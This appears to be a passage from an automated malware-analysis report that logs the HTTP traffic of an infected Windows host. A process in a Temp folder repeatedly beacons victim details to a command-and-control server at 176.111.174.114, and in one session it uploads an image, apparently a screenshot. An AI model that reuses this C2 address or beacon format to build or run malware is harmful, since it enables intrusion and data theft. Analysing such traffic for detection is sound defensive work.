                                                                                                                                          Apr 28, 2021 22:59:40.841882944 CEST6097OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          187176.111.174.11480192.168.2.449856C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:40.939368010 CEST6098INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          188192.168.2.449857176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.144257069 CEST6100OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          189176.111.174.11480192.168.2.449857C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.247226000 CEST6107INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          19176.111.174.11480192.168.2.449757C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:12.211220980 CEST4530INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          190192.168.2.449859176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.461703062 CEST6149OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          191176.111.174.11480192.168.2.449859C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.565853119 CEST6150INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          192192.168.2.449860176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.617577076 CEST6163OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:41.726336956 CEST6166OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:41.726377010 CEST6169OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 22:59:41.726727962 CEST6171OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:41.726870060 CEST6174OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:41.726999998 CEST6177OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:41.727544069 CEST6182OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 22:59:41.728128910 CEST6187OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 22:59:41.728271961 CEST6190OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:41.836637020 CEST6202OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:41.836689949 CEST6210OUTData Raw: 27 6a 0a e6 64 6f 01 ef 55 de 10 4e 3a 55 ea 64 8a 0b 73 51 ca 5c 64 72 db b6 f3 9a fd 31 ff 00 83 51 ae c4 5f f0 53 ad 4d ca b1 1f f0 aa 35 8f 95 17 24 e2 e2 c8 e0 0e e7 8a fc ce af 69 fd 83 ff 00 6f 0f 8d bf f0 4e cf 8d 77 1f 1f 3e 00 d9 e8 53
                                                                                                                                          Data Ascii: 'jdoUN:UdsQ\dr1Q_SM5$ioNw>Sk390D"|P$a#:ppUaC3qOaM|)|_u+"mTyhXwr$)@%j]6+/oqo!G# 9o(?Ko


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          193192.168.2.449861176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.784513950 CEST6191OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          194176.111.174.11480192.168.2.449861C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:41.882316113 CEST6245INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
